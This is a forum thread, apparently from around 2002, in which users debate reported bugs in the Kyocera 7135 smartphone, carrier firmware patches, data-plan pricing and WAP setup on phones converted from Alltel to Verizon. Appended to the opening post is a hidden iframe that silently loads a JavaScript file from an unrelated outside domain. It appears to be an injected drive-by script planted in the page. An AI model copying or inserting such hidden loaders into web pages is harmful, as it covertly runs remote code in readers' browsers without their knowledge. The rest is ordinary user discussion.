+ Reply to Thread

Why would you want to buy a 7135 now?

Why would you want to buy a 7135 now with all the 'bugs' listed on it's initial release? Here's one example posted on CNET:

"I got a copy" Jeff the Beta Tester on 25-Dec-2002 10:42:52 pm
    Ok, everyone on this board seems to be venting etc. I don't think this is the place, so I'm attempting to quiet you all down with a little review of my own. Long story short, I just got my hands on the 7135. I was lucky enough to pull strings as VZ Wireless and they shipped me a beta unit. I will be submitting feedback to them as well as this board, I hope you enjoy these comments. First off, they warned me, not everything will work. And it doesn't. I can't believe that AllTel decided to actually release this phone with so many bugs. For starters there seems to be some problems with the SD Slot. It has trouble reading my card, whether there is are JPGs or MP3s on it, and it won't write to it. Also, they have a built in utility, which takes an MP3 and turns it into a ringer: this does not work, because the Palm keeps rejecting the file, regardless of which MP3 I try. Also, the MP3 Player does not work -- but I believe that is a problem more with the desktop software than the phone software. (All the software came bundled). That being said, those are all the problems I've discovered so far. Each of these aren't huge deals, but you don't exactly release a phone this buggy...................
    Anyways, so eventually they will fix all the bugs, and the 7135's sold later will be fixed and work well. But what about all you who bought early on and are stuck with a defective device? What evidence do you have that Kyocera will release a patch for you? I see no evidence of any such patches for the 6035 on the Kyocera website, so why would they release any for the 7135?

Thus, is it better to wait a few months to get a phone with all the bugs worked out?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Why would you want to buy a 7135 now?

Originally posted by wcarlson40
    Why would you want to buy a 7135 now with all the 'bugs' listed on it's initial release? Here's one example posted on CNET:

Anyways, so eventually they will fix all the bugs, and the 7135's sold later will be fixed and work well. But what about all you who bought early on and are stuck with a defective device? What evidence do you have that Kyocera will release a patch for you? I see no evidence of any such patches for the 6035 on the Kyocera website, so why would they release any for the 7135?

Thus, is it better to wait a few months to get a phone with all the bugs worked out?
    When did this user Beta test? What version? Are they actually a Beta tester or some Samsung employee? Not one of the bugs listed is happening in my production 7135, and no one here who has a production unit has reported anything of the sort.

Finally, regarding patches. These are released to the carriers, not to individuals, so there wouldn't be "evidence" of them on the Kyo website. I understand that there were a number of patches issued for the 6035 over the past two years (others here who actually own 6035's can confirm).

Alan

1. I haven't had any problems ready two cards, a 64mb and a 256mb. I backup daily to the 64mb card and have tested the restore function in BackupBuddy VFS twice now.

2. I've created multiple ringers and have been using my MP3 player since I bought the phone. Files residing on my 256mb SD card.

"Each of these aren't huge deals, but you don't exactly release a phone this buggy"

I would consider not being able to read the SD card as well as not being able to play MP3's major. I can say that I have not had any of these problems.

As for the patches. Maybe I'll hold off flashing my 7135 with Verizon's software once they get around to releasing the phone. If its not broke don't fix it.

Of course, I'm posting this on my 7135 which seems to be working great. Maybe Jeff the beta tester should look into reviewing upcoming fiction novels because none of the problems he wrote about seem to be valid.

pdageek

The current 7135's won't be defective because firmware updates will fix current bugs... this is a design feature!

Any bug that isn't fixed by a firmware update (such as the SD slot not working?!?) will result in me sending back my Alltel 7135 to Kyo and demanding a working unit. Rest assured that the carrier-specific feature issues will be addressed through software patches.

Oh, and don't be so quick to believe any FUD you see online.

http://mikewren.com

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

mine works to

I havent had any trouble either.......... lets hope it doesnt start, which i am sure it wont as much as i have been playing with it.
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

I wonder what is the hold up then? If the altel phones work fine once converted to verizon service.... whats the deal? why wait? Is VZ waiting to release it with some sort of marketing campaign tied to a cheaper expressnetwork price? Is thier some bug that VZ doesnt like but Doesnt effect Altel's network? if so what, if anything doesnt work with VZ on a Converted altel phone? IS VZ planning to release their phone with limited features and is trying to find a way to block them?

My best guess is they want to roll it out with some sort of expressnetwork package with it so they can blab about its features like they tout the 270's brew features.
    iPhone therefore iAm.

That would be nice!!!
    ~'kito
    pdaPhoneHome Moderator

7135 with cheap Express Network... drooooooooool

I've been debating whether or not to upgrade to a 7135. Issues in the way are cost, especially since I just got my 6035 recently. If VZW released such a package and I could somehow wrangle a discount despite only having had my current phone for 6 months, I'd get it.

Carriers always claim they "Take a hit" on phone prices by offering "supposedly" cheaper than manufacures cost prices for phones and then making it up with the cost of the service plans........

Why doesn't anybody try it the other way around?

I'd gladly pay $699 versus $399-499 if they offered a CHEAPER data plan cause I know the extra $300 ivested would pay for itself in 3-4 months using a cheaper service plan!

I mean If sprint released at the same time with the same phone as VZ with a $10 unlmited plan versus a $99 VZ Plan how many people would jump ship? (I would If i didnt have this fixation with keeping the same number) by my math, 12 months difference between the two plans results in a savings of $1068 (data plan savigns only). Is that enough to cover the vz contract early termination fee and the loss of coverage area vz has besides the pain of telling eveyrbody your new number?

decisions decisions.
    iPhone therefore iAm.

Originally posted by Steve

I'd gladly pay $699 versus $399-499 if they offered a CHEAPER data plan cause I know the extra $300 ivested would pay for itself in 3-4 months using a cheaper service plan!

I mean If sprint released at the same time with the same phone as VZ with a $10 unlmited plan versus a $99 VZ Plan how many people would jump ship? (I would If i didnt have this fixation with keeping the same number
    This is what I've been thinking for awhile now, it's simple math. Also (reference another above post), Verizon isn't waiting to release the phone with a cheap Express Network plan, they could lower the price on it today.

I'm not too informed, but I think the cell phone companies will be required to support phone number portability (change carriers, keep same phone number) in November 2003 (unless they get another delay of the government mandate, or get it reverted all-together). If phone number portability becomes a reality, we should see Verizon competing with other carriers pricing.

+ralph

... if so what, if anything doesnt work with VZ on a Converted altel phone? ...
    WAP doesn't work on a converted phone. At least I haven't been able to get it to work after spending tons of time on the phone with Verizon support.

Another memember, MRitter I believe, reported that he was able to get his working with Verizon's help. I've PM'd him to ask what Verizon had him do beyond changing the WAP server IP addresses, but he hasn't responded yet.

So, long story short, I still don't have WAP working on my converted phone.

Andy

Originally posted by alenzini
    WAP doesn't work on a converted phone. At least I haven't been able to get it to work after spending tons of time on the phone with Verizon support.

Another memember, MRitter I believe, reported that he was able to get his working with Verizon's help. I've PM'd him to ask what Verizon had him do beyond changing the WAP server IP addresses, but he hasn't responded yet.

Andy
    Interesting. out of curiosity have you tried using that WAP tunnel yet?

& I assume You can still access WAP sites using blazer right?
    iPhone therefore iAm.

Interesting. out of curiosity have you tried using that WAP tunnel yet?

& I assume You can still access WAP sites using blazer right?
    I have tried the WAP tunnel site as well. Same result: "Service no available"

It seems, at least on the surface, that Verizon and ALLTEL use different methods for WAP connections. This is one of the configurable parameters that is part of the s/w flash, i.e., not user changeable.

I wonder if it is changeable in the KWPST software?

And yes, WAP works fine via Blazer via an Express Network connection.

Andy

Andy,

I followed some directions here (about putting a new gateway in), and had WAP working on Verizon in 5 minutes. I am in the Boston area.

Also, and this is really strange, my phone now has the Verizon Logo...?

Doberwiler

Originally posted by glenn_butler
    Andy,

I followed some directions here (about putting a new gateway in), and had WAP working on Verizon in 5 minutes. I am in the Boston area.

Doberwiler
    Bummer, I was afraid it was as simple as that. No luck for me.

Did you load a new CarrierLogo123.pdb file to get the new logo?

Andy

Originally posted by glenn_butler
    Andy,

Doberwiler
    Do you also use Express Network?

Thanks,

Andy

Originally posted by alenzini

Andy
    UPDATE: WAP does work on a converted phone. You need to modify the QNC login script if you have express network on you account. Details can be found http://www.smartphonesource.com/vbul...6&pagenumber=3

So, as far as I can tell, everything is working fine on a converted phone. Even the logo

Andy

Yes,

I also use express network, got that working today (again following a thread here).

Actual tested speeds using cradle/usb to http://chi.speakeasy.net/

Were
    61K Down and 78K up -- that's not bad over about a 1 minute test!

P.S. I'm in Boston.

Glenn (Doberwiler)